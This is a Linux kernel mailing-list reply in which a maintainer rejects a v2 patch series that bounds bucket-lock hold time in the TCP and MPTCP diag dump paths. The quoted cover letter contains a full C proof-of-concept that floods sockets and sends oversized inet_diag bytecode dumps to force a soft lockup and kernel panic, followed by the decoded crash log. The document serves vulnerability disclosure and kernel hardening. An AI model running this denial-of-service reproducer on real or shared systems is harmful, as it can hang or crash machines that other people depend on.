Re: [PATCH net v2 0/2] tcp: diag: bound bucket lock hold in diag dump paths
From: Kuniyuki Iwashima
Date: Wed Sep 02 2026 - 22:16:18 EST
On Tue, Sep 1, 2026 at 5:53 AM Zihan Xi <zihanx@xxxxxxxxxx> wrote:
>
> Hi Linux kernel maintainers,
>
> We found and validated an issue in net/ipv4/tcp_diag.c and
> net/mptcp/mptcp_diag.c. The bug is reachable by a
> non-root user via user and net namespace.
> Our testing did not identify any impact on other functionality.
>
> We will provide detailed information about the bug
> in this email, along with a PoC to trigger it.
>
> ---- details below ----
>
> Bug details:
>
> inet_diag TCP dumps currently execute request-supplied
> INET_DIAG_REQ_BYTECODE programs while still holding the listener, bind,
> or ehash bucket locks in tcp_diag_dump(). With a heavily populated
> bucket, the time spent under the same lock grows with both raw socket
> traversal and bytecode cost.
>
> The local listener reproducer creates four SO_REUSEPORT groups of 32768
> listeners each, 131072 sockets in total, and then issues a
> NETLINK_SOCK_DIAG dump request with 16380 INET_DIAG_BC_NOP instructions
Same feedback as v1.
tcp_diag_dump() is long enough, and I don't think that the "fix"
to avoid a long loop on *QEMU* due to an unreal setup is worth
300 LoC(hurn).
> followed by a failing INET_DIAG_BC_D_EQ test. This is a deliberately
> concentrated setup to make the lock scope observable; it is not intended
> to represent a typical deployment. Because every socket runs the full
> bytecode and none reaches the reply fill path, skb backpressure does not
> terminate the walk early.
> On the unfixed kernel, with local softlockup panic sysctls enabled, this
> makes the long bucket-locked section visible as a watchdog report and
> panic in inet_diag_bc_sk().
>
> The earlier batching fix direction was still too narrow: it only counted
> sockets that survived the cheap prefilters and reached the expensive dump
> path. An attacker can therefore populate one bucket with many sockets or
> listeners that fail the netns/family/port or MPTCP-specific prefilters,
> causing the same bucket lock to be scanned far past the 16-entry batch
> threshold before control is returned.
>
> The same root cause also exists in MPTCP listener dumping. The
> MPTCP-specific mptcp_diag_dump_listeners() path reuses sk_diag_dump(),
> which runs inet_diag_bc_sk() before filling the netlink reply, while the
> listener bucket lock is still held.
>
> The inline reproducer and decoded crash log below cover the TCP watchdog
> path only. They are not an MPTCP crash reproduction. The crash log is the
> decoded output of `./scripts/decode_stacktrace.sh`, with source paths
> reduced to repository-relative file and line references for review. The
> MPTCP patch addresses the equivalent listener lock scope identified by
> code inspection and completed MPTCP listener stress tests. A separate
> MPTCP crash artifact is not included, because the fixed MPTCP run
> completed without a crash.
>
> This series fixes both sites by keeping bucket-locked sections limited to
> raw socket collection and lifetime pinning, and moving all filtering,
> inet_diag_bc_sk(), and socket filling work out of the locked regions so
> the batch limit applies to raw bucket traversal itself. For TCP listener,
> bind, and ehash buckets, and for the MPTCP listener bucket, restarts now
> keep a referenced dump cursor so the next batch resumes after the
> previous socket instead of rescanning the bucket head under the same
> lock. A stored cursor is reused only after it is checked against the
> currently locked bucket. Listen and ehash resume also require the socket
> state to still belong to that table. Current-bucket membership is inferred
> from that state plus the recomputed hash slot. If the check fails,
> collection restarts from the bucket head with the same batch limit. That
> fallback can emit a socket more than once, but it does not move bytecode
> or fill work back under the bucket lock. Bind collection counts TIME_WAIT
> nodes toward the batch limit and restores them through tw_tb2.
>
> We also ran targeted cursor-resume stress tests on the fixed kernel. The
> TCP listener workload used 131072 listeners while a separate thread
> repeatedly removed and recreated listeners across listener buckets. Three
> runs completed in 17024.089 ms, 17217.245 ms, and 17180.322 ms, and the
> guest remained alive. With temporary kernel instrumentation, one run
> directly observed an invalid TCP listener cursor: the cursor was unhashed
> and its computed bucket differed from the bucket being scanned, after
> which the safe restart path completed normally.
>
> A corresponding MPTCP listener workload and a TCP bound-only close/rebind
> workload also completed without a crash, and the guest remained alive.
> Neither workload deterministically reached its instrumented invalid-cursor
> branch, and no crash artifact is claimed for either path.
>
> For ehash, a dedicated workload created 4096 loopback established TCP
> connections while a mutator replaced connection pairs concurrently. The
> TCPF_ALL inet_diag dump completed in 315.108 ms. No ehash invalid-cursor
> log, soft lockup, or panic was observed. These tests exercise the relevant
> mutation and resume paths, but do not claim deterministic scheduling of
> every race between two dump callbacks.
>
> The TCP patch uses two Fixes tags for the path-specific introductions:
> commit 5caea4ea7088 ("net: listening_hash get a spinlock per bucket")
> introduced the listener bucket spinlock, and commit 91051f003948
> ("tcp: Dump bound-only sockets in inet_diag.") introduced the bound-only
> path. The ehash dump already ran diagnostic work under the bucket lock
> before 7e3aab4a9cd7, which only converted that lock from read_lock_bh()
> to spin_lock_bh(), so that commit is not used as a Fixes tag. The MPTCP
> patch uses commit 4fa39b701ce9 ("mptcp: listen diag dump support").
>
> udp_diag and raw diag still run bytecode and fill under their own hash
> slot locks. Those locks are not the TCP listener, bind, or ehash locks,
> or the MPTCP listener lock, tightened by this series.
>
> Reproducer:
>
> gcc -O2 -static -o poc poc.c
> unshare -Urn ./poc
>
> This is not a packet-sequence or protocol-state reproducer. The trigger
> depends on creating many sockets and issuing NETLINK_SOCK_DIAG requests,
> which packetdrill cannot express, so the PoC uses sockets and Netlink
> directly.
>
> To make the long bucket-locked section observable in the local QEMU
> run below, we enabled softlockup panic sysctls as guest root. The
> unshare command above uses the PoC defaults, which are:
>
> ./poc --listen --groups 4 --stride 2048 --count 32768 --nops 16380
>
> The crash log reports UID: 0 because that process is the userns root
> created by unshare -Urn, after those sysctls were set as guest root.
> That UID does not by itself prove a host-unprivileged run. The inet_diag
> dump path itself is reachable from a user and net namespace.
>
> We run the PoC in a 2 vCPU, 2 GB RAM x86 QEMU environment.
>
> ------BEGIN poc.c------
> #define _GNU_SOURCE
>
> #include <arpa/inet.h>
> #include <errno.h>
> #include <linux/inet_diag.h>
> #include <linux/netlink.h>
> #include <linux/sock_diag.h>
> #include <linux/tcp.h>
> #include <sched.h>
> #include <stdbool.h>
> #include <stdint.h>
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <sys/resource.h>
> #include <sys/socket.h>
> #include <sys/time.h>
> #include <time.h>
> #include <unistd.h>
>
> #ifndef SOL_TCP
> #define SOL_TCP 6
> #endif
>
> #ifndef TCP_LISTEN
> #define TCP_LISTEN 10
> #endif
>
> #define TCPF_LISTEN (1U << TCP_LISTEN)
>
> #ifndef TCP_BOUND_INACTIVE
> #define TCP_BOUND_INACTIVE 13
> #endif
> #ifndef TCPF_BOUND_INACTIVE
> #define TCPF_BOUND_INACTIVE (1U << TCP_BOUND_INACTIVE)
> #endif
>
> #define DEFAULT_SOCKETS 32768U
> #define DEFAULT_NOPS 16380U
> #define DEFAULT_REPEAT 1U
> #define DEFAULT_GROUPS 4U
> #define DEFAULT_STRIDE 2048U
> #define DEFAULT_BASE_PORT 10000
> #define MAX_NOPS 16380U
> #define RECV_BUF_SIZE (1U << 20)
>
> struct options {
> unsigned int sockets;
> unsigned int nops;
> unsigned int repeat;
> unsigned int groups;
> unsigned int stride;
> unsigned int cpu;
> bool cpu_set;
> bool compare;
> bool attack;
> bool listen_mode;
> int port;
> };
>
> static void usage(const char *prog)
> {
> fprintf(stderr,
> "Usage: %s [--count N] [--nops N] [--repeat N] [--port P] [--cpu N]\n"
> " [--groups N] [--stride N] [--compare] [--no-attack]\n"
> " [--listen | --bound]\n"
> "Defaults: --count %u --nops %u --repeat %u\n",
> prog, DEFAULT_SOCKETS, DEFAULT_NOPS, DEFAULT_REPEAT);
> }
>
> static long long timespec_delta_ns(const struct timespec *start,
> const struct timespec *end)
> {
> return (end->tv_sec - start->tv_sec) * 1000000000LL +
> (end->tv_nsec - start->tv_nsec);
> }
>
> static int raise_nofile_limit(rlim_t needed)
> {
> struct rlimit lim;
>
> if (getrlimit(RLIMIT_NOFILE, &lim) < 0) {
> perror("getrlimit(RLIMIT_NOFILE)");
> return -1;
> }
>
> if (lim.rlim_cur >= needed)
> return 0;
>
> if (lim.rlim_max < needed)
> needed = lim.rlim_max;
>
> lim.rlim_cur = needed;
> if (setrlimit(RLIMIT_NOFILE, &lim) < 0) {
> perror("setrlimit(RLIMIT_NOFILE)");
> return -1;
> }
>
> if (getrlimit(RLIMIT_NOFILE, &lim) < 0) {
> perror("getrlimit(RLIMIT_NOFILE)");
> return -1;
> }
>
> if (lim.rlim_cur < needed) {
> fprintf(stderr, "RLIMIT_NOFILE stayed at %llu, need %llu\n",
> (unsigned long long)lim.rlim_cur,
> (unsigned long long)needed);
> return -1;
> }
>
> return 0;
> }
>
> static int pin_to_cpu(unsigned int cpu)
> {
> cpu_set_t set;
>
> CPU_ZERO(&set);
> CPU_SET(cpu, &set);
> if (sched_setaffinity(0, sizeof(set), &set) < 0) {
> perror("sched_setaffinity");
> return -1;
> }
>
> return 0;
> }
>
> static int create_socket_in_bucket(bool listen_mode, int port, int *bound_port)
> {
> struct sockaddr_in addr = {
> .sin_family = AF_INET,
> .sin_addr.s_addr = htonl(INADDR_ANY),
> };
> socklen_t addrlen = sizeof(addr);
> int one = 1;
> int fd;
>
> fd = socket(AF_INET, SOCK_STREAM | SOCK_CLOEXEC, 0);
> if (fd < 0) {
> perror("socket(AF_INET, SOCK_STREAM)");
> return -1;
> }
>
> if (setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one)) < 0) {
> perror("setsockopt(SO_REUSEADDR)");
> goto err;
> }
>
> if (setsockopt(fd, SOL_SOCKET, SO_REUSEPORT, &one, sizeof(one)) < 0) {
> perror("setsockopt(SO_REUSEPORT)");
> goto err;
> }
>
> addr.sin_port = htons(port);
> if (bind(fd, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
> perror("bind");
> goto err;
> }
>
> if (getsockname(fd, (struct sockaddr *)&addr, &addrlen) < 0) {
> perror("getsockname");
> goto err;
> }
>
> if (listen_mode) {
> if (listen(fd, 0) < 0) {
> perror("listen");
> goto err;
> }
> }
>
> *bound_port = ntohs(addr.sin_port);
> return fd;
>
> err:
> close(fd);
> return -1;
> }
>
> static int setup_sockets(bool listen_mode, unsigned int groups,
> unsigned int count_per_group, unsigned int stride,
> int requested_port, int **fds_out, int *port_out)
> {
> int *fds;
> unsigned int g, i;
> unsigned int total = groups * count_per_group;
> int base_port = requested_port ? requested_port : DEFAULT_BASE_PORT;
>
> fds = calloc(total, sizeof(*fds));
> if (!fds) {
> perror("calloc(socket fds)");
> return -1;
> }
>
> for (g = 0; g < groups; g++) {
> int port = base_port + (int)(g * stride);
>
> if (port <= 0 || port > 65535) {
> fprintf(stderr, "port overflow for group %u (base=%d stride=%u)\n",
> g, base_port, stride);
> goto err;
> }
>
> for (i = 0; i < count_per_group; i++) {
> unsigned int idx = g * count_per_group + i;
> int bound_port = port;
> int fd = create_socket_in_bucket(listen_mode, bound_port,
> &bound_port);
>
> if (fd < 0) {
> fprintf(stderr,
> "socket setup failed at group %u index %u (port %d)\n",
> g, i, port);
> goto err;
> }
>
> fds[idx] = fd;
> if ((idx + 1) % 4096U == 0 || idx + 1 == total) {
> printf("sockets_ready=%u group=%u port=%d mode=%s\n",
> idx + 1, g + 1, port,
> listen_mode ? "listen" : "bound");
> }
> }
> }
>
> *fds_out = fds;
> *port_out = base_port;
> return 0;
>
> err:
> for (i = 0; i < total; i++) {
> if (fds[i] > 0)
> close(fds[i]);
> }
> free(fds);
> return -1;
> }
>
> static void teardown_sockets(int *fds, unsigned int count)
> {
> unsigned int i;
>
> if (!fds)
> return;
>
> for (i = 0; i < count; i++) {
> if (fds[i] >= 0)
> close(fds[i]);
> }
> free(fds);
> }
>
> static size_t build_request(void *buf, bool listen_mode, bool with_attack,
> unsigned int nops)
> {
> size_t msg_len = NLMSG_SPACE(sizeof(struct inet_diag_req_v2));
> struct nlmsghdr *nlh = buf;
> struct inet_diag_req_v2 *req;
>
> memset(buf, 0, msg_len);
> nlh->nlmsg_len = msg_len;
> nlh->nlmsg_type = SOCK_DIAG_BY_FAMILY;
> nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_DUMP;
> nlh->nlmsg_seq = 1;
>
> req = NLMSG_DATA(nlh);
> req->sdiag_family = AF_INET;
> req->sdiag_protocol = IPPROTO_TCP;
> req->idiag_states = listen_mode ? TCPF_LISTEN : TCPF_BOUND_INACTIVE;
> req->id.idiag_cookie[0] = INET_DIAG_NOCOOKIE;
> req->id.idiag_cookie[1] = INET_DIAG_NOCOOKIE;
>
> if (with_attack) {
> size_t payload_len = ((size_t)nops + 2U) *
> sizeof(struct inet_diag_bc_op);
> size_t attr_len = NLA_HDRLEN + payload_len;
> struct nlattr *nla = (struct nlattr *)((char *)buf + msg_len);
> struct inet_diag_bc_op *ops;
> unsigned int i;
>
> memset(nla, 0, NLA_ALIGN(attr_len));
> nla->nla_type = INET_DIAG_REQ_BYTECODE;
> nla->nla_len = attr_len;
> ops = (struct inet_diag_bc_op *)((char *)nla + NLA_HDRLEN);
>
> for (i = 0; i < nops; i++) {
> ops[i].code = INET_DIAG_BC_NOP;
> ops[i].yes = sizeof(struct inet_diag_bc_op);
> ops[i].no = 0;
> }
>
> ops[nops].code = INET_DIAG_BC_D_EQ;
> ops[nops].yes = 2U * sizeof(struct inet_diag_bc_op);
> ops[nops].no = 3U * sizeof(struct inet_diag_bc_op);
>
> ops[nops + 1].code = 0;
> ops[nops + 1].yes = 0;
> ops[nops + 1].no = 1;
>
> msg_len += NLA_ALIGN(attr_len);
> nlh->nlmsg_len = msg_len;
> }
>
> return msg_len;
> }
>
> static int recv_until_done(int fd)
> {
> char *buf;
> int ret = 0;
>
> buf = malloc(RECV_BUF_SIZE);
> if (!buf) {
> perror("malloc(recv buf)");
> return -1;
> }
>
> for (;;) {
> ssize_t received = recv(fd, buf, RECV_BUF_SIZE, 0);
> struct nlmsghdr *nlh;
> int remaining;
>
> if (received < 0) {
> perror("recv");
> ret = -1;
> break;
> }
>
> if (received == 0) {
> fprintf(stderr, "recv: unexpected EOF\n");
> ret = -1;
> break;
> }
>
> remaining = (int)received;
> for (nlh = (struct nlmsghdr *)buf; NLMSG_OK(nlh, remaining);
> nlh = NLMSG_NEXT(nlh, remaining)) {
> if (nlh->nlmsg_type == NLMSG_DONE)
> goto out;
>
> if (nlh->nlmsg_type == NLMSG_ERROR) {
> const struct nlmsgerr *err = NLMSG_DATA(nlh);
>
> if (nlh->nlmsg_len < NLMSG_LENGTH(sizeof(*err))) {
> fprintf(stderr, "short NLMSG_ERROR\n");
> } else if (err->error) {
> errno = -err->error;
> perror("netlink");
> } else {
> fprintf(stderr, "unexpected ACK\n");
> }
> ret = -1;
> goto out;
> }
> }
> }
>
> out:
> free(buf);
> return ret;
> }
>
> static int run_dump(bool listen_mode, bool with_attack, unsigned int nops,
> double *wall_ms)
> {
> size_t request_len;
> size_t attr_space = with_attack ?
> NLA_ALIGN(NLA_HDRLEN +
> ((size_t)nops + 2U) *
> sizeof(struct inet_diag_bc_op)) : 0;
> size_t alloc_len = NLMSG_SPACE(sizeof(struct inet_diag_req_v2)) +
> attr_space;
> struct sockaddr_nl local = {
> .nl_family = AF_NETLINK,
> };
> struct sockaddr_nl kernel = {
> .nl_family = AF_NETLINK,
> };
> struct timeval timeout = {
> .tv_sec = 60,
> .tv_usec = 0,
> };
> struct iovec iov;
> struct msghdr msg = {
> .msg_name = &kernel,
> .msg_namelen = sizeof(kernel),
> .msg_iov = &iov,
> .msg_iovlen = 1,
> };
> struct timespec start_ts;
> struct timespec end_ts;
> void *request;
> int fd;
> int ret = -1;
>
> request = malloc(alloc_len);
> if (!request) {
> perror("malloc(request)");
> return -1;
> }
>
> request_len = build_request(request, listen_mode, with_attack, nops);
>
> fd = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC, NETLINK_SOCK_DIAG);
> if (fd < 0) {
> perror("socket(AF_NETLINK)");
> free(request);
> return -1;
> }
>
> if (setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, &timeout, sizeof(timeout)) < 0) {
> perror("setsockopt(SO_RCVTIMEO)");
> goto out;
> }
>
> if (bind(fd, (struct sockaddr *)&local, sizeof(local)) < 0) {
> perror("bind(netlink)");
> goto out;
> }
>
> iov.iov_base = request;
> iov.iov_len = request_len;
>
> if (clock_gettime(CLOCK_MONOTONIC_RAW, &start_ts) < 0) {
> perror("clock_gettime(start)");
> goto out;
> }
>
> if (sendmsg(fd, &msg, 0) < 0) {
> perror("sendmsg");
> goto out;
> }
>
> if (recv_until_done(fd) < 0)
> goto out;
>
> if (clock_gettime(CLOCK_MONOTONIC_RAW, &end_ts) < 0) {
> perror("clock_gettime(end)");
> goto out;
> }
>
> *wall_ms = (double)timespec_delta_ns(&start_ts, &end_ts) / 1000000.0;
> ret = 0;
>
> out:
> close(fd);
> free(request);
> return ret;
> }
>
> static int parse_u32(const char *arg, unsigned int *value)
> {
> char *end = NULL;
> unsigned long parsed;
>
> parsed = strtoul(arg, &end, 0);
> if (!end || *end || parsed > UINT32_MAX)
> return -1;
>
> *value = (unsigned int)parsed;
> return 0;
> }
>
> static int parse_port(const char *arg, int *port)
> {
> unsigned int value;
>
> if (parse_u32(arg, &value) < 0 || value > 65535U)
> return -1;
>
> *port = (int)value;
> return 0;
> }
>
> int main(int argc, char **argv)
> {
> struct options opts = {
> .sockets = DEFAULT_SOCKETS,
> .nops = DEFAULT_NOPS,
> .repeat = DEFAULT_REPEAT,
> .groups = DEFAULT_GROUPS,
> .stride = DEFAULT_STRIDE,
> .cpu = 0,
> .cpu_set = false,
> .compare = false,
> .attack = true,
> .listen_mode = true,
> .port = 0,
> };
> int *fds = NULL;
> int port = 0;
> unsigned int i;
>
> for (i = 1; i < (unsigned int)argc; i++) {
> if (strcmp(argv[i], "--count") == 0) {
> if (i + 1 >= (unsigned int)argc ||
> parse_u32(argv[++i], &opts.sockets) < 0 ||
> opts.sockets == 0) {
> usage(argv[0]);
> return 1;
> }
> } else if (strcmp(argv[i], "--nops") == 0) {
> if (i + 1 >= (unsigned int)argc ||
> parse_u32(argv[++i], &opts.nops) < 0 ||
> opts.nops > MAX_NOPS) {
> fprintf(stderr, "--nops must be in range [0, %u]\n",
> MAX_NOPS);
> return 1;
> }
> } else if (strcmp(argv[i], "--repeat") == 0) {
> if (i + 1 >= (unsigned int)argc ||
> parse_u32(argv[++i], &opts.repeat) < 0 ||
> opts.repeat == 0) {
> usage(argv[0]);
> return 1;
> }
> } else if (strcmp(argv[i], "--groups") == 0) {
> if (i + 1 >= (unsigned int)argc ||
> parse_u32(argv[++i], &opts.groups) < 0 ||
> opts.groups == 0) {
> usage(argv[0]);
> return 1;
> }
> } else if (strcmp(argv[i], "--stride") == 0) {
> if (i + 1 >= (unsigned int)argc ||
> parse_u32(argv[++i], &opts.stride) < 0 ||
> opts.stride == 0) {
> usage(argv[0]);
> return 1;
> }
> } else if (strcmp(argv[i], "--port") == 0) {
> if (i + 1 >= (unsigned int)argc ||
> parse_port(argv[++i], &opts.port) < 0) {
> usage(argv[0]);
> return 1;
> }
> } else if (strcmp(argv[i], "--cpu") == 0) {
> if (i + 1 >= (unsigned int)argc ||
> parse_u32(argv[++i], &opts.cpu) < 0) {
> usage(argv[0]);
> return 1;
> }
> opts.cpu_set = true;
> } else if (strcmp(argv[i], "--compare") == 0) {
> opts.compare = true;
> } else if (strcmp(argv[i], "--no-attack") == 0) {
> opts.attack = false;
> } else if (strcmp(argv[i], "--listen") == 0) {
> opts.listen_mode = true;
> } else if (strcmp(argv[i], "--bound") == 0) {
> opts.listen_mode = false;
> } else {
> usage(argv[0]);
> return 1;
> }
> }
>
> if (opts.groups > UINT32_MAX / opts.sockets) {
> fprintf(stderr, "socket count overflow\n");
> return 1;
> }
>
> if (raise_nofile_limit((rlim_t)opts.sockets * opts.groups + 64U) < 0)
> return 1;
>
> if (opts.cpu_set && pin_to_cpu(opts.cpu) < 0)
> return 1;
>
> if (setup_sockets(opts.listen_mode, opts.groups, opts.sockets,
> opts.stride, opts.port, &fds, &port) < 0)
> return 1;
>
> printf("setup_complete groups=%u sockets_per_group=%u total_sockets=%u base_port=%d stride=%u mode=%s nops=%u repeat=%u compare=%s attack=%s\n",
> opts.groups, opts.sockets, opts.groups * opts.sockets,
> port, opts.stride, opts.listen_mode ? "listen" : "bound",
> opts.nops, opts.repeat,
> opts.compare ? "yes" : "no",
> opts.attack ? "yes" : "no");
>
> if (opts.compare) {
> double wall_ms;
>
> if (run_dump(opts.listen_mode, false, 0, &wall_ms) < 0) {
> teardown_sockets(fds, opts.groups * opts.sockets);
> return 1;
> }
> printf("baseline wall_ms=%.3f\n", wall_ms);
> }
>
> if (opts.attack) {
> for (i = 0; i < opts.repeat; i++) {
> double wall_ms;
>
> if (run_dump(opts.listen_mode, true, opts.nops, &wall_ms) < 0) {
> teardown_sockets(fds, opts.groups * opts.sockets);
> return 1;
> }
> printf("attack_run=%u wall_ms=%.3f\n", i + 1, wall_ms);
> }
> }
>
> teardown_sockets(fds, opts.groups * opts.sockets);
> return 0;
> }
> ------END poc.c--------
>
> ----BEGIN crash log----
> watchdog: BUG: soft lockup - CPU#1 stuck for 3s! [poc:256]
> [ 21.507468] Modules linked in:
> [ 21.507471] CPU: 1 UID: 0 PID: 256 Comm: poc Not tainted 7.2.0-rc4-00390-g743916aa8e8c #5 PREEMPT(full)
> [ 21.507472] Hardware name: QEMU Ubuntu 24.04 PC v2 (i440FX + PIIX, arch_caps fix, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
> [ 21.507473] RIP: 0010:inet_diag_bc_sk (inet_diag.c:471 inet_diag.c:631)
> [ 21.507499] Code: 00 00 00 0f 87 89 00 00 00 3c 02 0f 84 4e 01 00 00 3c 03 0f 84 72 01 00 00 3c 01 75 31 0f b7 53 02 29 d5 48 01 d3 85 ed 7e 31 <0f> b6 03 3c 08 76 c2 3c 0b 0f 84 76 01 00 00 77 3a 3c 09 0f 84 54
> All code
> ========
> 0: 00 00 add %al,(%rax)
> 2: 00 0f add %cl,(%rdi)
> 4: 87 89 00 00 00 3c xchg %ecx,0x3c000000(%rcx)
> a: 02 0f add (%rdi),%cl
> c: 84 4e 01 test %cl,0x1(%rsi)
> f: 00 00 add %al,(%rax)
> 11: 3c 03 cmp $0x3,%al
> 13: 0f 84 72 01 00 00 je 0x18b
> 19: 3c 01 cmp $0x1,%al
> 1b: 75 31 jne 0x4e
> 1d: 0f b7 53 02 movzwl 0x2(%rbx),%edx
> 21: 29 d5 sub %edx,%ebp
> 23: 48 01 d3 add %rdx,%rbx
> 26: 85 ed test %ebp,%ebp
> 28: 7e 31 jle 0x5b
> 2a:* 0f b6 03 movzbl (%rbx),%eax <-- trapping instruction
> 2d: 3c 08 cmp $0x8,%al
> 2f: 76 c2 jbe 0xfffffffffffffff3
> 31: 3c 0b cmp $0xb,%al
> 33: 0f 84 76 01 00 00 je 0x1af
> 39: 77 3a ja 0x75
> 3b: 3c 09 cmp $0x9,%al
> 3d: 0f .byte 0xf
> 3e: 84 .byte 0x84
> 3f: 54 push %rsp
>
> Code starting with the faulting instruction
> ===========================================
> 0: 0f b6 03 movzbl (%rbx),%eax
> 3: 3c 08 cmp $0x8,%al
> 5: 76 c2 jbe 0xffffffffffffffc9
> 7: 3c 0b cmp $0xb,%al
> 9: 0f 84 76 01 00 00 je 0x185
> f: 77 3a ja 0x4b
> 11: 3c 09 cmp $0x9,%al
> 13: 0f .byte 0xf
> 14: 84 .byte 0x84
> 15: 54 push %rsp
> [ 21.507500] RSP: 0018:ffffbb290036b7a8 EFLAGS: 00000202
> [ 21.507501] RAX: 0000000000000000 RBX: ffff98bcf7ca2588 RCX: 0000000000000000
> [ 21.507502] RDX: 0000000000000004 RSI: ffff98bcf7ca0048 RDI: ffff98bcf61c9840
> [ 21.507502] RBP: 000000000000dabc R08: 0000000000000000 R09: ffff98bcdfb91440
> [ 21.507502] R10: 0000000000000000 R11: ffff98bcdfb91444 R12: 0000000000000000
> [ 21.507503] R13: 0000000000002f10 R14: 0000000000000000 R15: 0000000000000002
> [ 21.507508] FS: 0000000002be8380(0000) GS:ffff98bda3b6e000(0000) knlGS:0000000000000000
> [ 21.507509] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> [ 21.507510] CR2: 00007f62b3bb9000 CR3: 000000000c6b6005 CR4: 0000000000370ef0
> [ 21.507510] Call Trace:
> [ 21.507512] <TASK>
> [ 21.507512] ? inet_diag_bc_sk (inet_diag.c:632)
> [ 21.507514] tcp_diag_dump (tcp_diag.c:366)
> [ 21.507524] ? ___slab_alloc (slub.c:1080 slub.c:4524)
> [ 21.507526] ? __kmalloc_node_track_caller_noprof (slub.c:4936 slub.c:5361 slub.c:5497)
> [ 21.507527] ? inet_diag_handler_cmd (netlink.h:341 inet_diag.c:983)
> [ 21.507528] ? __alloc_skb (skbuff.c:715)
> [ 21.507531] ? kmalloc_reserve (skbuff.c:637 (discriminator 1))
> [ 21.507532] __inet_diag_dump (inet_diag.c:823)
> [ 21.507533] netlink_dump (af_netlink.c:2331)
> [ 21.507543] __netlink_dump_start (af_netlink.c:2446)
> [ 21.507544] inet_diag_handler_cmd (netlink.h:341 inet_diag.c:983)
> [ 21.507545] ? __pfx_inet_diag_dump_start (inet_diag.c:891)
> [ 21.507546] ? __pfx_inet_diag_dump (inet_diag.c:928)
> [ 21.507547] ? __pfx_inet_diag_dump_done (inet_diag.c:508)
> [ 21.507548] sock_diag_rcv_msg (sock_diag.c:248 sock_diag.c:284)
> [ 21.507550] ? __pfx_sock_diag_rcv_msg (sock_diag.c:306)
> [ 21.507551] netlink_rcv_skb (af_netlink.c:2556)
> [ 21.507553] netlink_unicast (af_netlink.c:1319 af_netlink.c:1345)
> [ 21.507554] netlink_sendmsg (af_netlink.c:1900)
> [ 21.507556] ____sys_sendmsg (socket.c:775 (discriminator 1) socket.c:790 (discriminator 1) socket.c:2684 (discriminator 1))
> [ 21.507558] ___sys_sendmsg (socket.c:2738)
> [ 21.507559] __sys_sendmsg (socket.c:2770)
> [ 21.507560] do_syscall_64 (syscall_64.c:63 syscall_64.c:94)
> [ 21.507563] entry_SYSCALL_64_after_hwframe (entry_64.S:121)
> [ 21.507564] RIP: 0033:0x421964
> [ 21.507566] Code: c2 c0 ff ff ff f7 d8 64 89 02 48 c7 c0 ff ff ff ff eb b5 0f 1f 00 f3 0f 1e fa 80 3d fd 26 09 00 00 74 13 b8 2e 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 4c c3 0f 1f 00 55 48 89 e5 48 83 ec 20 89 55
> All code
> ========
> 0: c2 c0 ff ret $0xffc0
> 3: ff (bad)
> 4: ff f7 push %rdi
> 6: d8 64 89 02 fsubs 0x2(%rcx,%rcx,4)
> a: 48 c7 c0 ff ff ff ff mov $0xffffffffffffffff,%rax
> 11: eb b5 jmp 0xffffffffffffffc8
> 13: 0f 1f 00 nopl (%rax)
> 16: f3 0f 1e fa endbr64
> 1a: 80 3d fd 26 09 00 00 cmpb $0x0,0x926fd(%rip) # 0x9271e
> 21: 74 13 je 0x36
> 23: b8 2e 00 00 00 mov $0x2e,%eax
> 28: 0f 05 syscall
> 2a:* 48 3d 00 f0 ff ff cmp $0xfffffffffffff000,%rax <-- trapping instruction
> 30: 77 4c ja 0x7e
> 32: c3 ret
> 33: 0f 1f 00 nopl (%rax)
> 36: 55 push %rbp
> 37: 48 89 e5 mov %rsp,%rbp
> 3a: 48 83 ec 20 sub $0x20,%rsp
> 3e: 89 .byte 0x89
> 3f: 55 push %rbp
>
> Code starting with the faulting instruction
> ===========================================
> 0: 48 3d 00 f0 ff ff cmp $0xfffffffffffff000,%rax
> 6: 77 4c ja 0x54
> 8: c3 ret
> 9: 0f 1f 00 nopl (%rax)
> c: 55 push %rbp
> d: 48 89 e5 mov %rsp,%rbp
> 10: 48 83 ec 20 sub $0x20,%rsp
> 14: 89 .byte 0x89
> 15: 55 push %rbp
> [ 21.507567] RSP: 002b:00007ffde1d1cfc8 EFLAGS: 00000202 ORIG_RAX: 000000000000002e
> [ 21.507568] RAX: ffffffffffffffda RBX: 0000000002bea910 RCX: 0000000000421964
> [ 21.507570] RDX: 0000000000000000 RSI: 00007ffde1d1d040 RDI: 0000000000020003
> [ 21.507571] RBP: 0000000000020003 R08: 0006b49d20000000 R09: 00007f62b3bb50e8
> [ 21.507571] R10: 0000000000000004 R11: 0000000000000202 R12: 00007ffde1d1d110
> [ 21.507571] R13: 0000000000003ffc R14: 0000000000010044 R15: 000000000000fffc
> [ 21.507572] </TASK>
> [ 21.507573] Kernel panic - not syncing: softlockup: hung tasks
> -----END crash log-----
>
> Best regards,
> Zihan Xi
>
> changes in v2:
> - Rebased onto net commit e2a6641e3bfd (2026-08-27).
> - Corrected the non-listener PoC state mask to TCPF_BOUND_INACTIVE.
> - Added current-bucket cursor validation for TCP listener, bind, and
> ehash paths, and for MPTCP listeners, with safe restart on mismatch.
> - Reject listen/ehash/MPTCP listener cursors unless sk_state still
> matches the table being walked.
> - Count TIME_WAIT bind nodes toward the batch limit and resume them via
> tw_tb2 instead of treating them as inet_connection_sock.
> - Kept the listener and bound-only TCP Fixes tags; dropped 7e3aab4a9cd7
> because that commit only converted the existing ehash dump lock type.
> - Sorted new TCP dump local declarations reverse xmas tree.
> - Moved INET_DIAG_DUMP_CURSOR_MPTCP_LISTEN into the MPTCP patch.
> - Read icsk_ulp_data with rcu_dereference() after dropping the MPTCP
> listener lock.
> - Refreshed the inline PoC and matching decoded crash log artifacts.
> - Corrected wording and removed duplicate crash-log provenance text.
> - Made PoC defaults match unshare -Urn ./poc (4 listener groups).
> - Clarified crash-log UID 0, cursor fallback restart, and that UDP/RAW
> diag locks are outside this series.
> - v1 Link: https://lore.kernel.org/all/cover.1785307984.git.zihanx@xxxxxxxxxx/
>
> Zihan Xi (2):
> tcp: diag: bound bucket lock hold in tcp_diag_dump()
> mptcp: diag: bound listener bucket lock hold
>
> include/linux/inet_diag.h | 15 ++
> include/net/inet_hashtables.h | 18 ++
